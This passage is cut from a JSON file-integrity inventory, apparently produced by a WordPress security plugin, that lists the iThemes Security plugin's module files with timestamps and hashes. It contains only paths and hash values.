m.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/settings-page.php\":{\"d\":1545735242,\"h\":\"fc72eeacd6e9c40bd6b007ac52b0ef2f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/class-itsec-four-oh-four.php\":{\"d\":1545735242,\"h\":\"7fa094e9bb77b1415acac9a63fb7a3af\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/validator.php\":{\"d\":1545735242,\"h\":\"d763a77f07ebff4bc777078997b9db38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/setup.php\":{\"d\":1545735242,\"h\":\"3d5778b215bb103e09377c28e72c7d91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/logs.php\":{\"d\":1545735242,\"h\":\"24f9e0aba3a246e651dbfb674adf90e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/active.php\":{\"d\":1545735242,\"h\":\"abec57c33b2e219578cc0b990f4d1294\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/settings.php\":{\"d\":1545735242,\"h\":\"3664985c382f9e2ea41e85a4d8b36e6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/settings-page.php\":{\"d\":1545735242,\"h\":\"3944290d703e096d127bf3083d4c7cdb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/config-generators.php\":{\"d\":1545735242,\"h\":\"8b6bca2e5fb5d1a22f5709ed60096685\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/validator.php\":{\"d\":1545735242,\"h\":\"a374f065f625b90b1b1e1c0bf79ee709\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/activate.php\":{\"d\":1545735242,\"h\":\"c028cc2b3058437a109a177b36c40f34\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/setup.php\":{\"d\":1545735242,\"h\":\"ab25dba7ce4b4e4edadc1857a9b2184b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/active.php\":{\"d\":1545735242,\"h\":\"3778470393a87b7e373320ac7bd4c589\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/settings.php\":{\"d\":1545735242,\"h\":\"c13a5df1c2eb71b602e7989431ad74c8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/class-itsec-system-tweaks.php\":{\"d\":1545735242,\"h\":\"d45c1877b58fda6bcfc9e772e44f45f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/system-tweaks\\/deactivate.php\":{\"d\":1545735242,\"h\":\"64b65c1e19cf17eb91417c27b3b2426f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/blankshield\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/blankshield\\/LICENSE\":{\"d\":1545735242,\"h\":\"c23e4b477e53765c6092518e5e15643f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/blankshield\\/blankshield.min.js\":{\"d\":1545735242,\"h\":\"48bc9e9d8beb4a741f8a1a120b02d928\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/block-tabnapping.js\":{\"d\":1545735242,\"h\":\"57ec1ebdca32e08c4ad92587d88e4313\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/settings-page.php\":{\"d\":1545735242,\"h\":\"72e14412bd0629a1baab50dd94b5d247\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/config-generators.php\":{\"d\":1545735242,\"h\":\"b96dd312ad88d688cdd075f550b6c9bb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/validator.php\":{\"d\":1545735242,\"h\":\"207b1ac655cb917527864ccda87bd819\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/activate.php\":{\"d\":1545735242,\"h\":\"15f144ec7d33b7ed1e3b37cfbc860a7c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/setup.php\":{\"d\":1545735242,\"h\":\"736f0c6b606f2bd92ce4a1b5b1b27cac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/active.php\":{\"d\":1545735242,\"h\":\"36ac85d1fbcac8a1dd9ac999c039d3ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/class-itsec-wordpress-tweaks.php\":{\"d\":1545735242,\"h\":\"cddf195b0a6627aeebd18e284c9e32b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/settings.php\":{\"d\":1545735242,\"h\":\"06416a16b29f626b8ae8fd4ccab7127e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/wordpress-tweaks\\/deactivate.php\":{\"d\":1545735242,\"h\":\"54aa496c6107d14d119092aa0c30bab1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/hackrepair-nginx.inc\":{\"d\":1545735242,\"h\":\"73da803b78ad471c38d4fe757191d3c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/hackrepair-apache.inc\":{\"d\":1545735242,\"h\":\"a0b5f34242041d417159a5f87360b7b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/hackrepair-litespeed.inc\":{\"d\":1545735242,\"h\":\"a0b5f34242041d417159a5f87360b7b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/lists\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/js\\/admin-ban_users.js\":{\"d\":1545735242,\"h\":\"a25c79323346673ea6b30b10fa1d91e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/class-itsec-ban-users.php\":{\"d\":1545735242,\"h\":\"5ee50afb675c3b1efbcaa9b1c873f02b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/init.php\":{\"d\":1545735242,\"h\":\"cb36189ae26353203fd28aa54f13796d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/settings-page.php\":{\"d\":1545735242,\"h\":\"08dd1ad13afce02aab169e05ef1531c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/config-generators.php\":{\"d\":1545735242,\"h\":\"925f5cb254d0c2658d061de74409cc06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/validator.php\":{\"d\":1545735242,\"h\":\"57b7d8a2e248d83a9320c3008e4c4f83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/activate.php\":{\"d\":1545735242,\"h\":\"801124f95930f49eca073618b760188c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/setup.php\":{\"d\":1545735242,\"h\":\"f6b57072c10a607c7493e54b2f70805a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/active.php\":{\"d\":1545735242,\"h\":\"b86621b40a86330cb4c4b3c327668051\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/settings.php\":{\"d\":1545735242,\"h\":\"fb7472e5a89d9a219f158cab66184ac4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ban-users\\/deactivate.php\":{\"d\":1545735242,\"h\":\"00fc522a16fad1e431ca003e3a6d9566\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/class-itsec-privacy.php\":{\"d\":1545735242,\"h\":\"d2cfdaef21bd70122c05e70023d99fc3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/util.php\":{\"d\":1545735242,\"h\":\"9e31e8b017454b679204e7d1c05e6db0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/privacy\\/active.php\":{\"d\":1545735242,\"h\":\"575248d6d607493f5799eb566f1e6004\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/css\\/settings-page.css\":{\"d\":1545735242,\"h\":\"008da836335a8eace05b3c5aedc18792\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"5de8da2c0197725bf9f5ddae925c4f7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/js\\/debug.js\":{\"d\":1545735242,\"h\":\"5330c4ad7c72ebfa516c4323c05b85c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/settings-page.php\":{\"d\":1545735242,\"h\":\"8afe096f057266613a2061608eeb1bd5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/validator.php\":{\"d\":1545735242,\"h\":\"fb0f0a97dcc61e7556942fd0c27c06fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/setup.php\":{\"d\":1545735242,\"h\":\"d3ec597d83ebf84655c246348f307c39\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/class-notification-center.php\":{\"d\":1545735242,\"h\":\"966e2047f296f469206346bbd0f39f69\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/logs.php\":{\"d\":1545735242,\"h\":\"809bae4f4e701915347c2c9e97f46713\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/active.php\":{\"d\":1545735242,\"h\":\"8372e30f382be91553d497894b3f3364\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/debug.php\":{\"d\":1545735242,\"h\":\"df3b94113094448fecbfd82683d8eb8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/notification-center\\/settings.php\":{\"d\":1545735242,\"h\":\"9844b8a5f882cd83cc25f31b33bdcb97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"821c3c49ec91f31f6f7afd6ff9c20318\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/class-itsec-ssl-admin.php\":{\"d\":1545735242,\"h\":\"f4667f262b9b229fb878657892eb7e26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/settings-page.php\":{\"d\":1545735242,\"h\":\"e8bcb68e1721d86c4ee77e0ec43fa15c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/validator.php\":{\"d\":1545735242,\"h\":\"fef2204c55be8344a7ef797a67f4aa09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/activate.php\":{\"d\":1545735242,\"h\":\"ee71fb06c2300e28351dfbfb6ae69e97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/setup.php\":{\"d\":1545735242,\"h\":\"31837c4ec22bac45841c85d11fb5b9b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/class-itsec-ssl.php\":{\"d\":1545735242,\"h\":\"42ee6a0d4172bfb7d2143fb34fe782e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/active.php\":{\"d\":1545735242,\"h\":\"f89e1edc7be7af2e875e67c21ad8f662\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/settings.php\":{\"d\":1545735242,\"h\":\"af454282c7e13033adb0eb9a4a4ae399\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ssl\\/deactivate.php\":{\"d\":1545735242,\"h\":\"148c35ecb0ee92a25117c65e280eda80\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-permissions\\/settings-page.php\":{\"d\":1545735242,\"h\":\"924b5049a99b2fc7b280598a25f1a27b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/file-permissions\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/pro\\/settings-page.php\":{\"d\":1545735242,\"h\":\"bd234412f17f96d813904d989a54709a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/pro\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/pro\\/setup.php\":{\"d\":1545735242,\"h\":\"5a6f1078eeae438be029b115e418873c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/database-prefix\\/settings-page.php\":{\"d\":1545735242,\"h\":\"7ed29582a652b5b1a915fdf1f1c10cc3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/database-prefix\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/database-prefix\\/utility.php\":{\"d\":1545735242,\"h\":\"1b01b7dac81cf1b14f8743e631a762b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/utilities.php\":{\"d\":1545735242,\"h\":\"368df353591c37770f9e5d68f6be6c30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/settings-page.php\":{\"d\":1545735242,\"h\":\"bb8917f14c87fcddf65fcc792f5bc90f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/validator.php\":{\"d\":1545735242,\"h\":\"3d6e9f7e9ff78590df02413587605b86\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/setup.php\":{\"d\":1545735242,\"h\":\"08088815347a2411f008bf77b2e8c573\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/active.php\":{\"d\":1545735242,\"h\":\"ce407ff5715c837d02b1aba7975bf512\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/salts\\/settings.php\":{\"d\":1545735242,\"h\":\"7846b860564da007e3bb44eae95a7ed3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/css\\/index.php\":{\"d\":1545735242,\"h\":\"67442c5615eba73d105c0715c6620850\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/css\\/malware.css\":{\"d\":1545735242,\"h\":\"b21762c7f514db84d0fbc27ff17b0be9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/css\\/settings.css\":{\"d\":1545735242,\"h\":\"d6968845c58e3470cc6d230f11d30889\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/sync-verbs\\/itsec-get-malware-scan-log.php\":{\"d\":1545735242,\"h\":\"418d6e1ffef28300691f30768901573b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/sync-verbs\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/sync-verbs\\/itsec-do-malware-scan.php\":{\"d\":1545735242,\"h\":\"5e981b0d315e8d67baaf99ce7230ea28\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/js\\/settings-page.js\":{\"d\":1545735242,\"h\":\"2e1a3e75fdc2998b5220b0561f753f72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/js\\/malware.js\":{\"d\":1545735242,\"h\":\"fde1c9b7af846b9e65b6686f4b6d184d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/privacy.php\":{\"d\":1545735242,\"h\":\"6f63f80a04780e8b650e794a0b0615e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/class-itsec-malware-scan-results-template.php\":{\"d\":1545735242,\"h\":\"fc423bbdabd4ed1870db1f2b5bb7f514\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/class-itsec-malware-scanner.php\":{\"d\":1545735242,\"h\":\"e49ddd32b51e46288bcbbd0226c6b5f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/settings-page.php\":{\"d\":1545735242,\"h\":\"20760a09b5a78dbda2e0cb684ef80554\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/setup.php\":{\"d\":1545735242,\"h\":\"ea8accba63e9414b770fd2e654b71ca5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/logs.php\":{\"d\":1545735242,\"h\":\"8687d8b9cd78a987fed2e8d57b84c187\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/active.php\":{\"d\":1545735242,\"h\":\"ac84cbab30ae5e7bdae8274f531641d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/malware\\/class-itsec-malware.php\":{\"d\":1545735242,\"h\":\"8ce452ed42d9da3f1560f8509155d35c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/img\\/index.php\":{\"d\":1545735242,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/js\\/index.php\":{\"d\":1545735242,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/js\\/mc-validate.js\":{\"d\":1545735242,\"h\":\"61f633358f3ab1aced604fa5399691d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-sync-cross-promo.php\":{\"d\":1545735242,\"h\":\"45f04c57a3c0ad305f1c4838ec33eb83\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-backupbuddy-cross-promo.php\":{\"d\":1545735242,\"h\":\"b5c03cb980b8ec9b8464b58ca0123456\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-pro-upsell.php\":{\"d\":1545735242,\"h\":\"2d75c9e99a043de5c073d1a3e8e2998f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-mail-list-signup.php\":{\"d\":1545735242,\"h\":\"43727536991fc4704684a9db601705d0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/sidebar-widget-support.php\":{\"d\":1545735242,\"h\":\"7c7db504f9a581babd7d0f02a66f349a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/core\\/validator.php\":{\"d\":1545735242,\"h\":\"ef1ffebcb18eb035abce6c6d53a8ffb3\"},\"\\/home\\/norfa